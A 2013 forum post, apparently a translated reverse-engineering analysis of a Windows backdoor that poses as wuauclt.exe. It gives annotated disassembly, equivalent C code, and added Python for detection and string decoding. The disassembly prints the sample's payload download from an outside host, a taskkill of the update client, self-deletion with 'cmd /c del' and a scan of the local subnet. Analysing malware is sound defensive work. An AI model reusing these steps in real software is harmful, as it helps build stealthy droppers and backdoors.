This post was last edited by JoyChou on 2013-9-25 17:32
//Author: JoyChou //Date: 2013-09-24 23:37:23
Malware name: Backdoor/Win32.Wuca.bj
Type: Backdoor
File MD5: 2A1AEF106795864CA9DB643A116807DC
File size: 9,728 bytes
Affected systems: Windows 98 and later
Packer: UPX 0.89.6 - 1.02 / 1.05 - 1.24
Built with: Microsoft Visual C++ 6.0
Execution flow: too lazy to draw a diagram. After the sample runs, it first checks whether the current process exists: if it does, it carries on with the functionality below; if not, it exits (it does nothing to hide its process, so after a double-click the process is of course present). The malware then elevates its own privileges and checks whether the current process path is "C:\WINDOWS\Fonts\wuauclt.exe".

If not: it creates a directory named sa.exe under C:\Windows and sets that directory's attributes to hidden and read-only. It runs the command cmd /c taskkill /im wuauclt.exe /f to terminate the wuauclt.exe process (wuauclt.exe is the Windows Automatic Updates client; it keeps checking online for updates, and killing it leaves the computer unable to receive the latest updates), which makes the disguise that follows easier. It copies the current sample to C:\WINDOWS\Fonts\wuauclt.exe and sets the hidden attribute (masquerading as the Windows Automatic Updates program). It runs cmd /c del "C:\Documents and Settings\Administrator\桌面\1.exe" to delete its own executable for stealth, then exits. Done.

If so (at this point locate the file C:\WINDOWS\Fonts\wuauclt.exe; browsing for it directly will not find it, so use the file search feature and then debug it in OD): it loads the system DLL "urlmon.dll" and calls its "URLDownloadToFileA" function to fetch the malicious file from http://360.1s.fr/ps.jpg and save it as C:\WINDOWS\Fonts\gern.fon. It then checks whether that file exists: if not, it shows a message box and exits; if it does, it creates several threads. Because the download fails, much of the functionality inside those threads cannot run. It mainly consists of creating a startup entry and running a remote-overflow tool and an svchost.exe file.
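As an added illustration (not part of the original post), the Python below turns the host-side behaviour just described into three checks over constructed process-creation events: wuauclt.exe running from somewhere other than System32, a taskkill of the real update client, and a cmd /c del aimed at the parent's own image. The event format and the sample events are my own construction.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

@dataclass
class ProcEvent:
    """One process-creation event (constructed format, not real telemetry)."""
    image: str          # full path of the new process
    cmdline: str        # its command line
    parent_image: str   # full path of the parent process

# Constructed events modelled on the behaviour described above: the sample
# kills the real wuauclt.exe, runs a copy of itself from the Fonts directory
# and deletes its dropper with "cmd /c del".
SAMPLE_EVENTS = [
    ProcEvent(r"C:\WINDOWS\system32\wuauclt.exe", "wuauclt.exe",
              r"C:\WINDOWS\system32\svchost.exe"),                     # the real client
    ProcEvent(r"C:\WINDOWS\system32\cmd.exe", "cmd /c taskkill /im wuauclt.exe /f",
              r"C:\Documents and Settings\Administrator\Desktop\1.exe"),
    ProcEvent(r"C:\WINDOWS\Fonts\wuauclt.exe", r"C:\WINDOWS\Fonts\wuauclt.exe",
              r"C:\Documents and Settings\Administrator\Desktop\1.exe"),
    ProcEvent(r"C:\WINDOWS\system32\cmd.exe",
              r'cmd /c del "C:\Documents and Settings\Administrator\Desktop\1.exe"',
              r"C:\Documents and Settings\Administrator\Desktop\1.exe"),
]

def _norm(path: str) -> str:
    """Strip surrounding quotes and lowercase so paths compare reliably."""
    return path.strip('"').lower()

def check_event(ev: ProcEvent) -> List[str]:
    """Return the names of the indicators this single event matches."""
    hits = []
    image = _norm(ev.image)
    cmd = ev.cmdline.lower()
    # 1. wuauclt.exe is a System32 binary; any other location is a masquerade.
    if image.endswith("\\wuauclt.exe") and "\\system32\\" not in image:
        hits.append("wuauclt_outside_system32")
    # 2. Forcibly killing the Automatic Updates client.
    if re.search(r"taskkill\b.*\s/im\s+wuauclt\.exe", cmd):
        hits.append("taskkill_wuauclt")
    # 3. "cmd /c del <path>" whose target is the parent's own executable.
    m = re.search(r'\bdel\s+("[^"]+"|\S+)', cmd)
    if m and _norm(m.group(1)) == _norm(ev.parent_image):
        hits.append("self_delete_via_cmd")
    return hits

def scan(events: List[ProcEvent]) -> Dict[str, List[str]]:
    """Map each indicator name to the command lines that triggered it."""
    report: Dict[str, List[str]] = {}
    for ev in events:
        for name in check_event(ev):
            report.setdefault(name, []).append(ev.cmdline)
    return report

if __name__ == "__main__":
    for name, lines in scan(SAMPLE_EVENTS).items():
        print(name)
        for line in lines:
            print("   ", line)
```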
Detailed analysis:
Here is some code:
00402130 >/$ 55 push ebp
00402131 |. 8BEC mov ebp,esp
00402133 |. 81EC AC030000 sub esp,0x3AC
00402139 |. 53 push ebx
0040213A |. 56 push esi
0040213B |. 57 push edi
0040213C |. E8 3FF8FFFF call wuauclt.00401980 ; enumerate processes
00402141 |. 85C0 test eax,eax
00402143 |. 74 08 je Xwuauclt.0040214D
00402145 |. 6A 00 push 0x0 ; /ExitCode = 0
00402147 |. FF15 60304000 call dword ptr ds:[<&KERNEL32.ExitProces>; \ExitProcess
0040214D |> E8 7EF4FFFF call wuauclt.004015D0 ; elevate privileges
00402152 |. 8D85 54FCFFFF lea eax,[local.235]
00402158 |. 68 04010000 push 0x104 ; /BufSize = 104 (260.)
0040215D |. 50 push eax ; |PathBuffer
0040215E |. 6A 00 push 0x0 ; |hModule = NULL
00402160 |. FF15 5C304000 call dword ptr ds:[<&KERNEL32.GetModuleF>; \GetModuleFileNameA
00402166 |. 8D8D 5CFEFFFF lea ecx,[local.105]
0040216C |. 68 04010000 push 0x104 ; /BufSize = 104 (260.)
00402171 |. 51 push ecx ; |Buffer
00402172 |. FF15 7C304000 call dword ptr ds:[<&KERNEL32.GetWindows>; \GetWindowsDirectoryA
00402178 |. BF 047D4000 mov edi,wuauclt.00407D04 ; ASCII "\Fonts\wuauclt.exe"
0040217D |. 83C9 FF or ecx,0xFFFFFFFF
00402180 |. 33C0 xor eax,eax
00402182 |. 8D95 5CFEFFFF lea edx,[local.105] ; edx:C:\windows
00402188 |. F2:AE repne scas byte ptr es:[edi]
0040218A |. F7D1 not ecx ; length of \Fonts\wuauclt.exe is 0x13
0040218C |. 2BF9 sub edi,ecx
0040218E |. 68 687F4000 push wuauclt.00407F68 ; ASCII "ont"
00402193 |. 8BF7 mov esi,edi
00402195 |. 8BD9 mov ebx,ecx
00402197 |. 8BFA mov edi,edx
00402199 |. 83C9 FF or ecx,0xFFFFFFFF
0040219C |. F2:AE repne scas byte ptr es:[edi]
0040219E |. 8BCB mov ecx,ebx
004021A0 |. 4F dec edi
004021A1 |. C1E9 02 shr ecx,0x2
004021A4 |. F3:A5 rep movs dword ptr es:[edi],dword ptr ds>
004021A6 |. 8BCB mov ecx,ebx
004021A8 |. 8D85 54FCFFFF lea eax,[local.235]
004021AE |. 83E1 03 and ecx,0x3
004021B1 |. 50 push eax
004021B2 |. F3:A4 rep movs byte ptr es:[edi],byte ptr ds:[>
004021B4 |. E8 27030000 call wuauclt.004024E0
004021B9 |. 83C4 08 add esp,0x8
004021BC |. 85C0 test eax,eax
004021BE |. 0F84 DA010000 je wuauclt.0040239E
004021C4 |. 33C9 xor ecx,ecx
004021C6 |. 8D55 EC lea edx,[local.5]
004021C9 |. 894D ED mov dword ptr ss:[ebp-0x13],ecx
004021CC |. 52 push edx
004021CD |. 894D F1 mov dword ptr ss:[ebp-0xF],ecx
004021D0 |. 68 B87D4000 push wuauclt.00407DB8 ; ASCII "khbced$Zbb"
004021D5 |. 894D F5 mov dword ptr ss:[ebp-0xB],ecx
004021D8 |. C645 EC 00 mov byte ptr ss:[ebp-0x14],0x0
004021DC |. 894D F9 mov dword ptr ss:[ebp-0x7],ecx
004021DF |. 66:894D FD mov word ptr ss:[ebp-0x3],cx
004021E3 |. 884D FF mov byte ptr ss:[ebp-0x1],cl
004021E6 |. E8 25F1FFFF call wuauclt.00401310 ; string decryption
004021EB |. 83C4 08 add esp,0x8
004021EE |. 90 nop
004021EF |. 90 nop
004021F0 |. 90 nop
004021F1 |. 90 nop
004021F2 |. 90 nop
004021F3 |. 90 nop
004021F4 |. 90 nop
004021F5 |. 90 nop
004021F6 |. 90 nop
004021F7 |. 90 nop
004021F8 |. 90 nop
004021F9 |. 90 nop
004021FA |. 90 nop
004021FB |. 90 nop
004021FC |. 90 nop
004021FD |. 90 nop
004021FE |. 90 nop
004021FF |. 90 nop
00402200 |. 90 nop
00402201 |. 90 nop
00402202 |. 90 nop
00402203 |. 90 nop
00402204 |. 90 nop
00402205 |. 90 nop
00402206 |. 90 nop
00402207 |. 90 nop
00402208 |. 90 nop
00402209 |. 90 nop
0040220A |. 90 nop
0040220B |. 90 nop
0040220C |. 90 nop
0040220D |. 90 nop
0040220E |. 90 nop
0040220F |. 90 nop
00402210 |. 90 nop
00402211 |. 90 nop
00402212 |. 90 nop
00402213 |. 90 nop
00402214 |. 90 nop
00402215 |. 90 nop
00402216 |. 8D45 EC lea eax,[local.5]
00402219 |. 50 push eax ; /FileName
0040221A |. FF15 38304000 call dword ptr ds:[<&KERNEL32.LoadLibrar>; \LoadLibraryA
00402220 |. 8BD8 mov ebx,eax
00402222 |. B9 09000000 mov ecx,0x9
00402227 |. 33C0 xor eax,eax
00402229 |. 8D7D C5 lea edi,dword ptr ss:[ebp-0x3B]
0040222C |. C645 C4 00 mov byte ptr ss:[ebp-0x3C],0x0
00402230 |. C685 60FFFFFF>mov byte ptr ss:[ebp-0xA0],0x0
00402237 |. F3:AB rep stos dword ptr es:[edi]
00402239 |. 66:AB stos word ptr es:[edi]
0040223B |. AA stos byte ptr es:[edi]
0040223C |. B9 18000000 mov ecx,0x18
00402241 |. 33C0 xor eax,eax
00402243 |. 8DBD 61FFFFFF lea edi,dword ptr ss:[ebp-0x9F]
00402249 |. F3:AB rep stos dword ptr es:[edi]
0040224B |. 66:AB stos word ptr es:[edi]
0040224D |. 8D4D C4 lea ecx,[local.15]
00402250 |. 51 push ecx
00402251 |. 68 A47D4000 push wuauclt.00407DA4 ; ASCII "KHB:emdbeWZJe<_b[7"
00402256 |. AA stos byte ptr es:[edi]
00402257 |. E8 B4F0FFFF call wuauclt.00401310
0040225C |. 83C4 08 add esp,0x8
0040225F |. 8D55 C4 lea edx,[local.15]
00402262 |. 52 push edx ; /URLDownloadToFileA
00402263 |. 53 push ebx ; |urlmon.dll
00402264 |. FF15 34304000 call dword ptr ds:[<&KERNEL32.GetProcAdd>; \GetProcAddress
0040226A |. A3 D88C4000 mov dword ptr ds:[0x408CD8],eax
0040226F |. 8D85 58FDFFFF lea eax,[local.170]
00402275 |. 68 04010000 push 0x104 ; /BufSize = 104 (260.)
0040227A |. 50 push eax ; |Buffer
0040227B |. FF15 7C304000 call dword ptr ds:[<&KERNEL32.GetWindows>; \GetWindowsDirectoryA
00402281 |. BF D47C4000 mov edi,wuauclt.00407CD4 ; ASCII "\Fonts\gern.fon"
00402286 |. 83C9 FF or ecx,0xFFFFFFFF
00402289 |. 33C0 xor eax,eax
0040228B |. 8D95 58FDFFFF lea edx,[local.170]
00402291 |. F2:AE repne scas byte ptr es:[edi]
00402293 |. F7D1 not ecx
00402295 |. 2BF9 sub edi,ecx
00402297 |. 8BF7 mov esi,edi
00402299 |. 8BFA mov edi,edx
0040229B |. 8BD1 mov edx,ecx
0040229D |. 83C9 FF or ecx,0xFFFFFFFF
004022A0 |. F2:AE repne scas byte ptr es:[edi]
004022A2 |. 8BCA mov ecx,edx
004022A4 |. 4F dec edi
004022A5 |. C1E9 02 shr ecx,0x2
004022A8 |. F3:A5 rep movs dword ptr es:[edi],dword ptr ds>
004022AA |. 8BCA mov ecx,edx
004022AC |. 8D85 60FFFFFF lea eax,[local.40]
004022B2 |. 83E1 03 and ecx,0x3
004022B5 |. 50 push eax
004022B6 |. F3:A4 rep movs byte ptr es:[edi],byte ptr ds:[>
004022B8 |. 68 507F4000 push wuauclt.00407F50 ; ASCII "^jjf0%%),&$'i$\h%fi$`f]"
004022BD |. E8 4EF0FFFF call wuauclt.00401310 ; http://360.1s.fr/ps.jpg
004022C2 |. 83C4 08 add esp,0x8
004022C5 |. 8D8D 58FDFFFF lea ecx,[local.170]
004022CB |. 8D95 60FFFFFF lea edx,[local.40]
004022D1 |. 6A 00 push 0x0
004022D3 |. 6A 00 push 0x0
004022D5 |. 51 push ecx ; C:\WINDOWS\Fonts\gern.fon
004022D6 |. 52 push edx ; http://360.1s.fr/ps.jpg
004022D7 |. 6A 00 push 0x0
004022D9 |. FF15 D88C4000 call dword ptr ds:[0x408CD8]
004022DF 68 10270000 push 0x2710
004022E4 |. FF15 88304000 call dword ptr ds:[<&KERNEL32.Sleep>] ; \Sleep
004022EA |. 53 push ebx ; /hLibModule
004022EB |. FF15 30304000 call dword ptr ds:[<&KERNEL32.FreeLibrar>; \FreeLibrary
004022F1 |. 8D85 58FDFFFF lea eax,[local.170]
004022F7 |. 50 push eax ; /FileName
004022F8 |. FF15 2C304000 call dword ptr ds:[<&KERNEL32.GetFileAtt>; \GetFileAttributesA
004022FE |. 83F8 FF cmp eax,-0x1
00402301 |. 6A 00 push 0x0 ; /Style = MB_OK|MB_APPLMODAL
00402303 |. 75 1E jnz Xwuauclt.00402323 ; |
00402305 |. 68 487F4000 push wuauclt.00407F48 ; |Title = "http"
0040230A |. 68 3C7F4000 push wuauclt.00407F3C ; |Text = "qq935623508"
0040230F 6A FF push -0x1
00402311 |. FF15 B0304000 call dword ptr ds:[<&USER32.MessageBoxA>>; \MessageBoxA
00402317 |. 5F pop edi
00402318 |. 5E pop esi
00402319 |. B8 01000000 mov eax,0x1
0040231E |. 5B pop ebx
0040231F |. 8BE5 mov esp,ebp
00402321 |. 5D pop ebp
00402322 |. C3 retn
00402323 |> 8B35 58304000 mov esi,dword ptr ds:[<&KERNEL32.CreateT>; |kernel32.CreateThread
00402329 |. 6A 00 push 0x0 ; |CreationFlags = 0
0040232B |. 6A 00 push 0x0 ; |pThreadParm = NULL
0040232D |. 68 801F4000 push wuauclt.00401F80 ; |ThreadFunction = wuauclt.00401F80
00402332 |. 6A 00 push 0x0 ; |StackSize = 0
00402334 |. 6A 00 push 0x0 ; |pSecurity = NULL
00402336 |. FFD6 call esi ; \CreateThread
00402338 |. 6A 00 push 0x0 ; /pThreadId = NULL
0040233A |. 6A 00 push 0x0 ; |CreationFlags = 0
0040233C |. 6A 00 push 0x0 ; |pThreadParm = NULL
0040233E |. 68 301C4000 push wuauclt.00401C30 ; |ThreadFunction = wuauclt.00401C30
00402343 |. 6A 00 push 0x0 ; |StackSize = 0
00402345 |. 6A 00 push 0x0 ; |pSecurity = NULL
00402347 |. FFD6 call esi ; \CreateThread
00402349 |. 6A 00 push 0x0 ; /pThreadId = NULL
0040234B |. 6A 00 push 0x0 ; |CreationFlags = 0
0040234D |. 6A 00 push 0x0 ; |pThreadParm = NULL
0040234F |. 68 F0194000 push wuauclt.004019F0 ; |ThreadFunction = wuauclt.004019F0
00402354 |. 6A 00 push 0x0 ; |StackSize = 0
00402356 |. 6A 00 push 0x0 ; |pSecurity = NULL
00402358 |. FFD6 call esi ; \CreateThread
0040235A |. 6A 00 push 0x0 ; /pThreadId = NULL
0040235C |. 6A 00 push 0x0 ; |CreationFlags = 0
0040235E |. 6A 00 push 0x0 ; |pThreadParm = NULL
00402360 |. 68 40164000 push wuauclt.00401640 ; |ThreadFunction = wuauclt.00401640
00402365 |. 6A 00 push 0x0 ; |StackSize = 0
00402367 |. 6A 00 push 0x0 ; |pSecurity = NULL
00402369 |. FFD6 call esi ; \CreateThread
0040236B |. 6A 00 push 0x0 ; /pThreadId = NULL
0040236D |. 6A 00 push 0x0 ; |CreationFlags = 0
0040236F |. 6A 00 push 0x0 ; |pThreadParm = NULL
00402371 |. 68 50174000 push wuauclt.00401750 ; |ThreadFunction = wuauclt.00401750
00402376 |. 6A 00 push 0x0 ; |StackSize = 0
00402378 |. 6A 00 push 0x0 ; |pSecurity = NULL
0040237A |. FFD6 call esi ; \CreateThread
0040237C |. 6A 00 push 0x0 ; /pThreadId = NULL
0040237E |. 6A 00 push 0x0 ; |CreationFlags = 0
00402380 |. 6A 00 push 0x0 ; |pThreadParm = NULL
00402382 |. 68 701D4000 push wuauclt.00401D70 ; |ThreadFunction = wuauclt.00401D70
00402387 |. 6A 00 push 0x0 ; |StackSize = 0
00402389 |. 6A 00 push 0x0 ; |pSecurity = NULL
0040238B |. FFD6 call esi ; \CreateThread
0040238D |. E8 CEF2FFFF call wuauclt.00401660 ; set up the startup entry
00402392 |. 5F pop edi
00402393 |. 5E pop esi
00402394 |. B8 01000000 mov eax,0x1
00402399 |. 5B pop ebx
0040239A |. 8BE5 mov esp,ebp
0040239C |. 5D pop ebp
0040239D |. C3 retn
0040239E |> 68 307F4000 push wuauclt.00407F30 ; ASCII "C:\sa.exe"
004023A3 |. E8 4E020000 call wuauclt.004025F6 ; create directory
004023A8 |. 8B35 88304000 mov esi,dword ptr ds:[<&KERNEL32.Sleep>] ; kernel32.Sleep
004023AE |. 83C4 04 add esp,0x4
004023B1 |. 6A 64 push 0x64 ; /Timeout = 100. ms
004023B3 |. FFD6 call esi ; \Sleep
004023B5 |. 6A 03 push 0x3 ; /FileAttributes = READONLY|HIDDEN
004023B7 |. 68 307F4000 push wuauclt.00407F30 ; |FileName = "C:\sa.exe"
004023BC |. FF15 9C304000 call dword ptr ds:[<&KERNEL32.SetFileAtt>; \SetFileAttributesA
004023C2 |. 8B1D 28304000 mov ebx,dword ptr ds:[<&KERNEL32.WinExec>; kernel32.WinExec
004023C8 |. 6A 00 push 0x0 ; /ShowState = SW_HIDE
004023CA |. 68 0C7F4000 push wuauclt.00407F0C ; |CmdLine = "cmd /c taskkill /im wuauclt.exe /f"
004023CF |. FFD3 call ebx ; \WinExec
004023D1 |. 68 D0070000 push 0x7D0 ; /Timeout = 2000. ms
004023D6 |. FFD6 call esi ; \Sleep
004023D8 |. 8D8D 5CFEFFFF lea ecx,[local.105]
004023DE |. 6A 00 push 0x0 ; /FailIfExists = FALSE
004023E0 |. 8D95 54FCFFFF lea edx,[local.235] ; |
004023E6 |. 51 push ecx ; |NewFileName
004023E7 |. 52 push edx ; |ExistingFileName
004023E8 |. FF15 50304000 call dword ptr ds:[<&KERNEL32.CopyFileA>>; \CopyFileA
004023EE |. 68 A00F0000 push 0xFA0 ; /Timeout = 4000. ms
004023F3 |. FFD6 call esi ; \Sleep
004023F5 |. 8D85 5CFEFFFF lea eax,[local.105]
004023FB |. 6A 00 push 0x0 ; /ShowState = SW_HIDE
004023FD |. 50 push eax ; |CmdLine
004023FE |. FFD3 call ebx ; \WinExec
00402400 |. B9 18000000 mov ecx,0x18
00402405 |. 33C0 xor eax,eax
00402407 |. 8DBD 61FFFFFF lea edi,dword ptr ss:[ebp-0x9F]
0040240D |. C685 60FFFFFF>mov byte ptr ss:[ebp-0xA0],0x0
00402414 |. F3:AB rep stos dword ptr es:[edi]
00402416 |. 66:AB stos word ptr es:[edi]
00402418 |. AA stos byte ptr es:[edi]
00402419 |. BF 007F4000 mov edi,wuauclt.00407F00 ; ASCII "cmd /c del "
0040241E |. 83C9 FF or ecx,0xFFFFFFFF
00402421 |. 33C0 xor eax,eax
00402423 |. 8D95 60FFFFFF lea edx,[local.40]
00402429 |. F2:AE repne scas byte ptr es:[edi]
0040242B |. F7D1 not ecx
0040242D |. 2BF9 sub edi,ecx
0040242F |. 8BC1 mov eax,ecx
00402431 |. 8BF7 mov esi,edi
00402433 |. 8BFA mov edi,edx
00402435 |. C1E9 02 shr ecx,0x2
00402438 |. F3:A5 rep movs dword ptr es:[edi],dword ptr ds>
0040243A |. 8BC8 mov ecx,eax
0040243C |. 83E1 03 and ecx,0x3
0040243F |. F3:A4 rep movs byte ptr es:[edi],byte ptr ds:[>
00402441 |. FF15 4C304000 call dword ptr ds:[<&KERNEL32.GetCommand>; [GetCommandLineA
00402447 |. 8BF8 mov edi,eax
00402449 |. 83C9 FF or ecx,0xFFFFFFFF
0040244C |. 33C0 xor eax,eax
0040244E |. 8D95 60FFFFFF lea edx,[local.40]
00402454 |. F2:AE repne scas byte ptr es:[edi]
00402456 |. F7D1 not ecx
00402458 |. 2BF9 sub edi,ecx
0040245A |. 50 push eax ; /ShowState => SW_HIDE
0040245B |. 8BF7 mov esi,edi ; |
0040245D |. 8BFA mov edi,edx ; |
0040245F |. 8BD1 mov edx,ecx ; |
00402461 |. 83C9 FF or ecx,0xFFFFFFFF ; |
00402464 |. F2:AE repne scas byte ptr es:[edi] ; |
00402466 |. 8BCA mov ecx,edx ; |
00402468 |. 4F dec edi ; |
00402469 |. C1E9 02 shr ecx,0x2 ; |
0040246C |. F3:A5 rep movs dword ptr es:[edi],dword ptr ds>; |
0040246E |. 8BCA mov ecx,edx ; |
00402470 |. 8D85 60FFFFFF lea eax,[local.40] ; |
00402476 |. 83E1 03 and ecx,0x3 ; |
00402479 |. 50 push eax ; |CmdLine
0040247A |. F3:A4 rep movs byte ptr es:[edi],byte ptr ds:[>; |
0040247C |. FFD3 call ebx ; \WinExec
0040247E |. 6A 00 push 0x0 ; /ExitCode = 0
00402480 \. FF15 60304000 call dword ptr ds:[<&KERNEL32.ExitProces>; \ExitProcess
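The listing pairs three obfuscated strings with the plaintext the decryption routine at 00401310 produces ("khbced$Zbb" becomes "urlmon.dll", and so on). As an added example, not code from the original post, the Python below recovers the per-byte shift from those known pairs and applies it to any further string from the binary; that the routine is nothing more than a constant byte shift is inferred here from the three pairs alone, not from analysing the routine itself.

```python
# Known (obfuscated, plaintext) pairs taken from the comments in the listing above.
KNOWN_PAIRS = [
    ("khbced$Zbb", "urlmon.dll"),                               # LoadLibraryA argument
    ("KHB:emdbeWZJe<_b[7", "URLDownloadToFileA"),               # GetProcAddress argument
    (r"^jjf0%%),&$'i$\h%fi$`f]", "http://360.1s.fr/ps.jpg"),    # download URL
]

def recover_shift(pairs):
    """Return the single additive byte shift consistent with every pair,
    or None if the pairs are not explained by one constant shift."""
    shifts = set()
    for obfuscated, plain in pairs:
        if len(obfuscated) != len(plain):
            return None
        for c, p in zip(obfuscated.encode("latin-1"), plain.encode("latin-1")):
            shifts.add((p - c) % 256)
    return shifts.pop() if len(shifts) == 1 else None

def decode(obfuscated: str, shift: int) -> str:
    """Apply the recovered shift byte by byte (the inverse of the obfuscation)."""
    return bytes((c + shift) % 256 for c in obfuscated.encode("latin-1")).decode("latin-1")

def encode(plain: str, shift: int) -> str:
    """Re-obfuscate a string; handy for checking that a recovered shift round-trips."""
    return decode(plain, (-shift) % 256)

if __name__ == "__main__":
    shift = recover_shift(KNOWN_PAIRS)
    print("recovered shift: +%d" % shift)
    for obfuscated, _ in KNOWN_PAIRS:
        print("%-28r -> %s" % (obfuscated, decode(obfuscated, shift)))
```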
401d70 is an important thread callback function.
It obtains the host name and then the host's IP.
00401D7E |. 8D85 FCFAFFFF lea eax,[local.321]
00401D84 |. 50 push eax ; /pWSAData
00401D85 |. 6A 02 push 0x2 ; |RequestedVersion = 2 (2.0.)
00401D87 |. E8 34070000 call <jmp.&WS2_32.#115> ; \WSAStartup
00401D8C |. 85C0 test eax,eax
00401D8E |. 0F85 DA010000 jnz wuauclt.00401F6E
00401D94 |. 53 push ebx
00401D95 |. 56 push esi
00401D96 |. 57 push edi
00401D97 |. 8D8D 94FEFFFF lea ecx,[local.91]
00401D9D |. 68 FF000000 push 0xFF ; /BufSize = FF (255.)
00401DA2 |. 51 push ecx ; |Buffer
00401DA3 |. E8 30070000 call <jmp.&WS2_32.#57> ; \gethostname
00401DA8 |. 85C0 test eax,eax
00401DAA |. 0F85 AB010000 jnz wuauclt.00401F5B
00401DB0 |. 8D95 94FEFFFF lea edx,[local.91]
00401DB6 |. 52 push edx ; /Name
00401DB7 |. E8 16070000 call <jmp.&WS2_32.#52> ; \gethostbyname
00401DBC |. 85C0 test eax,eax
00401DBE |. 8945 F8 mov [local.2],eax
Equivalent code:
#include <stdio.h>
#include <winsock2.h>   // must be included before windows.h
#include <windows.h>
#pragma comment(lib, "WS2_32.lib") // must come after the headers, otherwise it errors

int main(void)
{
    WORD wVersionRequested; // requested Winsock version
    WSADATA wsaData;
    int err;
    wVersionRequested = MAKEWORD(2, 2); // Winsock version 2.2
    // load the socket library; return on failure
    err = WSAStartup(wVersionRequested, &wsaData); // the socket library must be loaded first
    if (err != 0)
    {
        return 1;
    }
    // check that both the high and low byte are 2; exit if the version is not 2.2
    if (LOBYTE(wsaData.wVersion) != 2 ||
        HIBYTE(wsaData.wVersion) != 2)
    {
        WSACleanup();
        return 1;
    }
    char hostname[256] = {0};
    gethostname(hostname, sizeof(hostname)); // get the host name
    printf("%s\n", hostname);
    PHOSTENT hostinfo;
    char *ip = NULL;
    if ((hostinfo = gethostbyname(hostname)) != NULL) // look up host information by host name
    {
        int nCount = 0;
        while (hostinfo->h_addr_list[nCount])
        {
            ip = inet_ntoa(*(struct in_addr *)hostinfo->h_addr_list[nCount]);
            printf("IP #%d: %s\n", ++nCount, ip);
        }
    }
    WSACleanup();
    getchar(); // keep the console window open
    return 0;
}
192.168.160 is the first 24 bits of my machine's IP, so looping 256 times will of course reach my IP (but why not just take the full 32-bit IP directly? T_T~).
It initializes a socket and, acting as a client, connects to 192.168.160.0 in turn (the last octet is incremented by 1 each time, looping 256 times).
If the connection does not succeed it runs the backdoor program explorer.exe, which shows that the backdoor is a server-side program.
00401EB1 |. C745 FC 00000>mov [local.1],0x0
00401EB8 |> 8B45 F8 /mov eax,[local.2]
00401EBB |. 8B48 0C |mov ecx,dword ptr ds:[eax+0xC]
00401EBE |. 8B11 |mov edx,dword ptr ds:[ecx]
00401EC0 |. 8A4D FC |mov cl,byte ptr ss:[ebp-0x4]
00401EC3 |. 884A 03 |mov byte ptr ds:[edx+0x3],cl
00401EC6 |. 8B50 0C |mov edx,dword ptr ds:[eax+0xC]
00401EC9 |. 8B02 |mov eax,dword ptr ds:[edx]
00401ECB |. 8B08 |mov ecx,dword ptr ds:[eax]
00401ECD |. 51 |push ecx ; /in_addr
00401ECE |. E8 F9050000 |call <jmp.&WS2_32.#12> ; \inet_ntoa
00401ED3 |. 8BD8 |mov ebx,eax
00401ED5 |. 53 |push ebx
00401ED6 |. E8 C5FCFFFF |call wuauclt.00401BA0 ; initialize a socket and, as a client, connect to 192.168.160.0 in turn (last octet incremented by 1 each pass, 256 passes)
00401EDB |. 83C4 04 |add esp,0x4
00401EDE |. 84C0 |test al,al
00401EE0 |. 74 67 |je Xwuauclt.00401F49 ; jump if the connection succeeded
00401EE2 |. BF 547E4000 |mov edi,wuauclt.00407E54
00401EE7 |. 83C9 FF |or ecx,0xFFFFFFFF
00401EEA |. 33C0 |xor eax,eax
00401EEC |. F2:AE |repne scas byte ptr es:[edi]
00401EEE |. F7D1 |not ecx
00401EF0 |. 2BF9 |sub edi,ecx
00401EF2 |. 50 |push eax ; /IsShown => 0
00401EF3 |. 8BF7 |mov esi,edi ; |
00401EF5 |. 8BD1 |mov edx,ecx ; |
00401EF7 |. 8BFB |mov edi,ebx ; |
00401EF9 |. 83C9 FF |or ecx,0xFFFFFFFF ; |
00401EFC |. F2:AE |repne scas byte ptr es:[edi] ; |
00401EFE |. 8BCA |mov ecx,edx ; |
00401F00 |. 4F |dec edi ; |
00401F01 |. C1E9 02 |shr ecx,0x2 ; |
00401F04 |. F3:A5 |rep movs dword ptr es:[edi],dword ptr d>; |
00401F06 |. 8BCA |mov ecx,edx ; |
00401F08 |. 50 |push eax ; |DefDir => NULL
00401F09 |. 83E1 03 |and ecx,0x3 ; |
00401F0C |. 53 |push ebx ; |Parameters
00401F0D |. F3:A4 |rep movs byte ptr es:[edi],byte ptr ds:>; |
00401F0F |. 8D7D 94 |lea edi,[local.27] ; |
00401F12 |. 83C9 FF |or ecx,0xFFFFFFFF ; |
00401F15 |. F2:AE |repne scas byte ptr es:[edi] ; |
00401F17 |. F7D1 |not ecx ; |
00401F19 |. 2BF9 |sub edi,ecx ; |
00401F1B |. 8BF7 |mov esi,edi ; |
00401F1D |. 8BD1 |mov edx,ecx ; |
00401F1F |. 8BFB |mov edi,ebx ; |
00401F21 |. 83C9 FF |or ecx,0xFFFFFFFF ; |
00401F24 |. F2:AE |repne scas byte ptr es:[edi] ; |
00401F26 |. 8BCA |mov ecx,edx ; |
00401F28 |. 4F |dec edi ; |
00401F29 |. C1E9 02 |shr ecx,0x2 ; |
00401F2C |. F3:A5 |rep movs dword ptr es:[edi],dword ptr d>; |
00401F2E |. 8BCA |mov ecx,edx ; |
00401F30 |. 8D85 90FDFFFF |lea eax,[local.156] ; |
00401F36 |. 83E1 03 |and ecx,0x3 ; |
00401F39 |. 50 |push eax ; |FileName
00401F3A |. 68 C47D4000 |push wuauclt.00407DC4 ; |Operation = "open"
00401F3F |. 6A 00 |push 0x0 ; |hWnd = NULL
00401F41 |. F3:A4 |rep movs byte ptr es:[edi],byte ptr ds:>; |
00401F43 |. FF15 A8304000 |call dword ptr ds:[<&SHELL32.ShellExecu>; \ShellExecuteA // run the backdoor
00401F49 |> 8B45 FC |mov eax,[local.1]
00401F4C |. 40 |inc eax
00401F4D |. 3D 00010000 |cmp eax,0x100 ; loop count 16*16 = 256, from 0 to 255
00401F52 |. 8945 FC |mov [local.1],eax
00401F55 |.^ 0F8C 5DFFFFFF \jl wuauclt.00401EB8
00401F5B |> E8 66050000 call <jmp.&WS2_32.#116> ; [WSACleanup
Socket initialization: 00401ED6 call 00401BA0
00401BA0 /$ 81EC A0010000 sub esp,0x1A0
00401BA6 |. 8D4424 10 lea eax,dword ptr ss:[esp+0x10]
00401BAA |. 56 push esi
00401BAB |. 50 push eax ; /pWSAData
00401BAC |. 68 01010000 push 0x101 ; |RequestedVersion = 101 (1.1.)
00401BB1 |. E8 0A090000 call <jmp.&WS2_32.#115> ; \WSAStartup
00401BB6 |. 85C0 test eax,eax
00401BB8 |. 74 0A je Xwuauclt.00401BC4
00401BBA |. 32C0 xor al,al
00401BBC |. 5E pop esi
00401BBD |. 81C4 A0010000 add esp,0x1A0
00401BC3 |. C3 retn
